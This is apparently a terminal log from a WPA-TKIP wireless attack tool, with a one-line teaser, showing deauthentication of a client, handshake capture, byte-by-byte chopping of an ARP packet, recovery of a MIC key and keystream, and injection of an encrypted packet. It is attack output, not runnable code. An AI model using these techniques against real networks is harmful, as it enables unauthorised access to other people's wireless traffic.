The WPA "Gone in 900 seconds" will become reality eventually...

Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
19:04:52 Michael Test: Successful
19:04:52 Waiting for beacon frame (BSSID: 00:1E:7D:54:DF:F2) on channel 7
19:04:52 Found specified AP
19:04:52 WPA handshake: 00:1D:7E:56:FD:F6 captured73:D7:CA:88] [20| 2 ACKs]
19:04:52 Sending 4 directed DeAuth. STMAC: [00:1A:73:D7:CA:88] [22| 3 ACKs]
19:04:53 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0217-190458.cap
19:04:58 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0217-190458.cap
19:08:25 Offset 93 ( 0% done) | xor = 80 | pt = 43 | 252 frames written in 206998ms
19:11:27 Offset 92 ( 1% done) | xor = FC | pt = 85 | 153 frames written in 125364ms
19:15:08 Offset 91 ( 3% done) | xor = 84 | pt = AD | 200 frames written in 164038ms
19:19:17 Offset 90 ( 5% done) | xor = 9A | pt = 84 | 236 frames written in 193658ms
19:20:19 Offset 89 ( 7% done) | xor = 88 | pt = A5 | 2 frames written in 1639ms
19:22:28 Offset 88 ( 9% done) | xor = 68 | pt = 94 | 86 frames written in 70487ms
19:24:30 Offset 87 (11% done) | xor = 35 | pt = A0 | 78 frames written in 63926ms
19:26:59 Offset 86 (12% done) | xor = DC | pt = E7 | 111 frames written in 90966ms
19:31:18 Offset 85 (14% done) | xor = 1A | pt = 21 | 248 frames written in 203533ms
19:34:49 Offset 84 (16% done) | xor = 96 | pt = 7D | 188 frames written in 154168ms
19:36:54 Offset 83 (18% done) | xor = D8 | pt = 46 | 81 frames written in 66386ms
19:38:50 Offset 82 (20% done) | xor = 9A | pt = D7 | 70 frames written in 57372ms
19:40:05 Offset 81 (22% done) | xor = 17 | pt = 00 | 19 frames written in 15574ms
19:43:38 Offset 80 (24% done) | xor = 00 | pt = 00 | 190 frames written in 155810ms
19:47:54 Offset 79 (25% done) | xor = 46 | pt = 67 | 245 frames written in 201083ms
19:50:37 Offset 78 (27% done) | xor = D7 | pt = 5D | 129 frames written in 105738ms
19:53:14 Offset 77 (29% done) | xor = 96 | pt = 87 | 120 frames written in 98299ms
19:54:17 Offset 76 (31% done) | xor = CD | pt = 00 | 4 frames written in 3277ms
19:57:46 Offset 75 (33% done) | xor = E3 | pt = 10 | 186 frames written in 152503ms
20:00:42 Offset 74 (35% done) | xor = ED | pt = 50 | 144 frames written in 118009ms
20:03:07 Offset 73 (37% done) | xor = CC | pt = 16 | 106 frames written in 86870ms
20:04:17 Offset 72 (38% done) | xor = 0E | pt = DB | 13 frames written in 10658ms
20:07:49 Offset 71 (40% done) | xor = 8A | pt = 3B | 190 frames written in 155806ms
20:09:53 Offset 70 (42% done) | xor = 82 | pt = B2 | 80 frames written in 65565ms
20:14:37 Offset 69 (44% done) | xor = A5 | pt = 9E | 203 frames written in 166504ms
20:18:47 Offset 68 (46% done) | xor = 11 | pt = 92 | 236 frames written in 193673ms
20:19:51 Offset 67 (48% done) | xor = C4 | pt = 37 | 4 frames written in 3279ms
20:21:20 Offset 66 (50% done) | xor = DE | pt = 48 | 36 frames written in 29506ms
20:22:35 Offset 65 (51% done) | xor = EA | pt = F3 | 17 frames written in 14445ms
Sleeping for 60 seconds.31 bytes still unknown
ARP Reply
Checking 192.168.x.y
Checking 10.x.y.z
Sent 772 packets, current guess: 00...
20:33:54 Moved one step backwards to chop the last byte again.
20:35:50 Offset 65 (51% done) | xor = 97 | pt = 8E | 144 frames written in 118024ms
20:38:30 Offset 64 (53% done) | xor = 87 | pt = C2 | 125 frames written in 102432ms
20:41:45 Offset 63 (55% done) | xor = B7 | pt = 50 | 167 frames written in 136874ms
20:43:46 Offset 62 (57% done) | xor = 59 | pt = 00 | 76 frames written in 62291ms
20:47:41 Offset 61 (59% done) | xor = 9B | pt = 8E | 217 frames written in 178036ms
20:49:48 Offset 60 (61% done) | xor = 5B | pt = 01 | 84 frames written in 68849ms
20:51:23 Offset 59 (62% done) | xor = 96 | pt = A8 | 43 frames written in 35248ms
20:53:01 Offset 58 (64% done) | xor = 21 | pt = C0 | 47 frames written in 38524ms
20:54:16 Offset 57 (66% done) | xor = 94 | pt = 53 | 18 frames written in 14753ms
20:58:07 Offset 56 (68% done) | xor = FA | pt = 93 | 213 frames written in 174742ms
21:00:22 Offset 55 (70% done) | xor = 23 | pt = 55 | 94 frames written in 77040ms
21:02:43 Offset 54 (72% done) | xor = D8 | pt = D1 | 101 frames written in 82771ms
21:06:44 Offset 53 (74% done) | xor = B9 | pt = 81 | 225 frames written in 184617ms
21:09:34 Offset 52 (75% done) | xor = 7B | pt = BA | 137 frames written in 112264ms
21:13:27 Offset 51 (77% done) | xor = 5D | pt = 06 | 216 frames written in 177202ms
21:17:13 Offset 50 (79% done) | xor = C7 | pt = 32 | 207 frames written in 169794ms
21:19:30 Offset 49 (81% done) | xor = 5F | pt = 00 | 95 frames written in 77854ms
21:21:24 Offset 48 (83% done) | xor = EA | pt = 00 | 67 frames written in 54911ms
21:22:33 Offset 47 (85% done) | xor = A3 | pt = 6C | 11 frames written in 9603ms
Sleeping for 60 seconds.13 bytes still unknown
ARP Reply
Checking 192.168.x.y
Checking 10.x.y.z
Sent 772 packets, current guess: 00...
21:33:52 Moved one step backwards to chop the last byte again.
21:34:57 Offset 47 (85% done) | xor = 80 | pt = 4F | 81 frames written in 66390ms
21:36:09 Offset 46 (87% done) | xor = 45 | pt = A7 | 15 frames written in 12292ms
Sent 515 packets, current guess: 00...
The AP appears to drop packets shorter than 46 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 46 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Workaround couldn't fix ICV checksum.
Packet is most likely invalid/useless
Try another one.
21:44:03 Reversed MIC Key (FromDS): 2A:C3:4E:17:18:24:BD:CA
Saving plaintext in replay_dec-0217-214403.cap
Saving keystream in replay_dec-0217-214403.xor
21:44:03 Completed in 9540s (0.01 bytes/s)
21:44:03 AP MAC: 32:06:BA:81:D1:55 IP: 147.***.***.168
21:44:03 Client MAC: 00:1A:73:D7:CA:88 IP: 72.**.***.158
21:44:03 Sent encrypted tkip ARP request to the client.